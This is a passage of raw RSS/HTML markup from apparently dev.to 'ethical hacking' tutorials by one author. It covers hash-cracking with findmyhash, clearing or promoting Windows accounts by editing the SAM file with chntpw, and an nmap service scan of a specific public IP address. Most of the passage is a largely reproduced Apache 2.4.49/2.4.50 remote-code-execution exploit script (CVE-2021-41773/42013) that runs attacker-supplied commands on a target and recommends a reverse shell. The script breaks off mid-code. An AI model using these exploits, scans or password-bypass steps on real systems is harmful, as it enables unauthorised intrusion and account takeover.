&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$username&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$username&lt;/span&gt;.&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.&lt;span class="nv"&gt;$salt&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)))))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;sha1&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;sha1&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;sha1&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;))))&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;+] md5&lt;span class="o"&gt;(&lt;/span&gt;strtoupper&lt;span class="o"&gt;(&lt;/span&gt;md5&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="o"&gt;)))&lt;/span&gt;
&lt;span class="nt"&gt;--------------------------------------------------&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  we are trying to crack the hash in the local database using the findmyhash tool
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;findmyhash  md5 &lt;span class="nt"&gt;-h&lt;/span&gt; 3615cdf80ebacda55dd2aa30dc4bebd0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  Change password (chntpw)
&lt;/h1&gt;

&lt;p&gt;Best tool to crack password easily by knowing SAM files&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;chntpw
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;OUTPUT&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;chntpw version 1.00 140201, (c) Petter N Hagen
chntpw: change password of a user in a Windows SAM file,
or invoke registry editor. Should handle both 32 and 64 bit windows and
all version from NT3.x to Win8.1
chntpw [OPTIONS] &amp;lt;samfile&amp;gt; [systemfile] [securityfile] [otherreghive] [...]
 -h          This message
 -u &amp;lt;user&amp;gt;   Username or RID (0x3e9 for example) to interactively edit
 -l          list all users in SAM file and exit
 -i          Interactive Menu system
 -e          Registry editor. Now with full write support!
 -d          Enter buffer debugger instead (hex editor), 
 -v          Be a little more verbose (for debuging)
 -L          For scripts, write names of changed files to /tmp/changed
 -N          No allocation mode. Only same length overwrites possible (very safe mode)
 -E          No expand mode, do not expand hive file (safe mode)

Usernames can be given as name or RID (in hex with 0x first)

See readme file on how to get to the registry files, and what they are.
Source/binary freely distributable under GPL v2 license. See README for details.
NOTE: This program is somewhat hackish! You are on your own!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Let's go to the windows&amp;gt;system32 folder
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; /media/samglish/D8CC0490CC046AD8/Windows/System32/config 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;after&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;chntpw &lt;span class="nt"&gt;-i&lt;/span&gt; SAM
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;OUTPUT&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;chntpw version 1.00 140201, (c) Petter N Hagen
Hive &amp;lt;SAM&amp;gt; name (from header): &amp;lt;\SystemRoot\System32\Config\SAM&amp;gt;
ROOT KEY at offset: 0x001020 * Subkey indexing type is: 686c &amp;lt;lh&amp;gt;
File size 65536 [10000] bytes, containing 8 pages (+ 1 headerpage)
Used for data: 315/32832 blocks/bytes, unused: 25/16064 blocks/bytes.



&amp;lt;&amp;gt;========&amp;lt;&amp;gt; chntpw Main Interactive Menu &amp;lt;&amp;gt;========&amp;lt;&amp;gt;

Loaded hives: &amp;lt;SAM&amp;gt;

  1 - Edit user data and passwords
  2 - List groups
      - - -
  9 - Registry editor, now with full write support!
  q - Quit (you will be asked if there is something to save)


What to do? [1] -&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Press 1&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;===== chntpw Edit User Info &amp;amp; Passwords ====

| RID -|---------- Username ------------| Admin? |- Lock? --|
| 01f4 | Administrateur                 | ADMIN  | dis/lock |
| 01f7 | DefaultAccount                 |        | dis/lock |
| 03e9 | Glish                          | ADMIN  |          |
| 01f5 | Invit�                         |        |          |
| 01f8 | WDAGUtilityAccount             |        | dis/lock |

Please enter user number (RID) or 0 to exit: [3e9] 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Copy RID 03e9 and paste in terminal&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;================= USER EDIT ====================

RID     : 1001 [03e9]
Username: Glish
fullname: 
comment : 
homedir : 

00000220 = Administrateurs (which has 2 members)

Account bits: 0x0214 =
[ ] Disabled        | [ ] Homedir req.    | [X] Passwd not req. | 
[ ] Temp. duplicate | [X] Normal account  | [ ] NMS account     | 
[ ] Domain trust ac | [ ] Wks trust act.  | [ ] Srv trust act   | 
[X] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08)  | 
[ ] (unknown 0x10)  | [ ] (unknown 0x20)  | [ ] (unknown 0x40)  | 

Failed login count: 0, while max tries is: 0
Total  login count: 461

- - - - User Edit Menu:
 1 - Clear (blank) user password
(2 - Unlock and enable user account) [seems unlocked already]
 3 - Promote user (make user an administrator)
 4 - Add user to a group
 5 - Remove user from a group
 q - Quit editing user, back to user select
Select: [q] &amp;gt; 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
      <category>ethicalhacking</category>
      <category>password</category>
      <category>cybersecurity</category>
      <category>security</category>
    </item>
    <item>
      <title>Server side (vulnerability scanning)</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Fri, 05 Jul 2024 00:02:53 +0000</pubDate>
      <link>https://forem.com/samglish/server-side-vulnerability-scanning-1hf9</link>
      <guid>https://forem.com/samglish/server-side-vulnerability-scanning-1hf9</guid>
      <description>&lt;p&gt;&lt;strong&gt;Ethical Hacking&lt;/strong&gt;&lt;br&gt;
Visit the github project: &lt;a href="https://github.com/samglish/ServerSide" rel="noopener noreferrer"&gt;https://github.com/samglish/ServerSide&lt;/a&gt; &lt;/p&gt;
&lt;h2&gt;
  
  
  Tools
&lt;/h2&gt;




&lt;ul&gt;
&lt;li&gt;Skipfish&lt;/li&gt;
&lt;li&gt;Owasp Disrbuster&lt;/li&gt;
&lt;li&gt;Webslayer&lt;/li&gt;
&lt;li&gt;Nmap&lt;/li&gt;
&lt;li&gt;Nessus&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  The first scanner we will use
&lt;/h3&gt;

&lt;p&gt;Nmap&lt;br&gt;
&lt;/p&gt;

&lt;br&gt;
to see the services running, launch nmap.&lt;br&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-sV&lt;/span&gt; 145.14.145.161
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Starting Nmap 7.91 ( https://nmap.org ) at 2024-07-04 22:50 WAT
Nmap scan report for 145.14.145.161
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE   VERSION
21/tcp  open  ftp?
80/tcp  open  http      awex
443/tcp open  ssl/https awex
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can retrieve the services that are running or go directly to retrieve them from the database.&lt;br&gt;
&lt;a href="https://www.exploit-db.com/" rel="noopener noreferrer"&gt;&lt;/a&gt;&lt;a href="https://www.exploit-db.com/" rel="noopener noreferrer"&gt;https://www.exploit-db.com/&lt;/a&gt;&lt;br&gt;
&lt;br&gt;&lt;br&gt;
Service:&lt;code&gt;http&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1ejrwm59s8smoj4sgqqs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1ejrwm59s8smoj4sgqqs.png" alt=" " width="800" height="326"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Download the python file exploit&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi87frcny6d1ljklk63ae.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi87frcny6d1ljklk63ae.png" alt=" " width="800" height="327"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Look the python file
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
# Date: 11/11/2021
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://apache.org/
# Version: Apache 2.4.49/2.4.50 (CGI enabled)
# Tested on: Debian GNU/Linux
# CVE : CVE-2021-41773 / CVE-2021-42013
# Credits : Lucas Schnell
&lt;/span&gt;

&lt;span class="c1"&gt;#!/usr/bin/env python3
#coding: utf-8
&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;re&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;time&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;colorama&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Fore&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;Style&lt;/span&gt;

&lt;span class="n"&gt;header&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;'''&lt;/span&gt;&lt;span class="se"&gt;\033&lt;/span&gt;&lt;span class="s"&gt;[1;91m

     ▄▄▄       ██▓███   ▄▄▄       ▄████▄   ██░ ██ ▓█████     ██▀███   ▄████▄  ▓█████ 
    ▒████▄    ▓██░  ██▒▒████▄    ▒██▀ ▀█  ▓██░ ██▒▓█   ▀    ▓██ ▒ ██▒▒██▀ ▀█  ▓█   ▀ 
    ▒██  ▀█▄  ▓██░ ██▓▒▒██  ▀█▄  ▒▓█    ▄ ▒██▀▀██░▒███      ▓██ ░▄█ ▒▒▓█    ▄ ▒███   
    ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█  ▄    ▒██▀▀█▄  ▒▓▓▄ ▄██▒▒▓█  ▄ 
    ▓█   ▓██▒▒██▒ ░  ░ ▓█   ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒   ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
    ▒▒   ▓▒█░▒▓▒░ ░  ░ ▒▒   ▓▒█░░ ░▒ ▒  ░ ▒ ░░▒░▒░░ ▒░ ░   ░ ▒▓ ░▒▓░░ ░▒ ▒  ░░░ ▒░ ░
    ▒   ▒▒ ░░▒ ░       ▒   ▒▒ ░  ░  ▒    ▒ ░▒░ ░ ░ ░  ░     ░▒ ░ ▒░  ░  ▒    ░ ░  ░
    ░   ▒   ░░         ░   ▒   ░         ░  ░░ ░   ░        ░░   ░ ░           ░ 
&lt;/span&gt;&lt;span class="sh"&gt;'''&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;Style&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;RESET_ALL&lt;/span&gt;


&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Use: python3 file.py ip:port &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\t\033&lt;/span&gt;&lt;span class="s"&gt;[1;91m[!] Bye bye !&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;time&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;sleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;0.5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;commands&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;command&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;session&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;directory&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;mute_command&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;pwd&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;mute_command&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;whoami&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;hostname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;mute_command&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;hostname&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;advise&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Fore&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;YELLOW&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Reverse shell is advised (This isn&lt;/span&gt;&lt;span class="se"&gt;\'&lt;/span&gt;&lt;span class="s"&gt;t an interactive shell)&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;command&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;input&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;Fore&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;RED&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;╭─&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;Fore&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GREEN&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;@&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;hostname&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;Fore&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;BLUE&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;directory&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;Fore&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;RED&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;╰─&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;Fore&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;YELLOW&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;$ &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;Style&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;RESET_ALL&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;    
    &lt;span class="n"&gt;command&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;echo; &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;command&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;;&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;POST&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;command&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;prepare&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;url&lt;/span&gt;  
    &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;session&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prepare&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;clear&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;command&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;/usr/bin/clear&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;header&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;exit&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;command&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

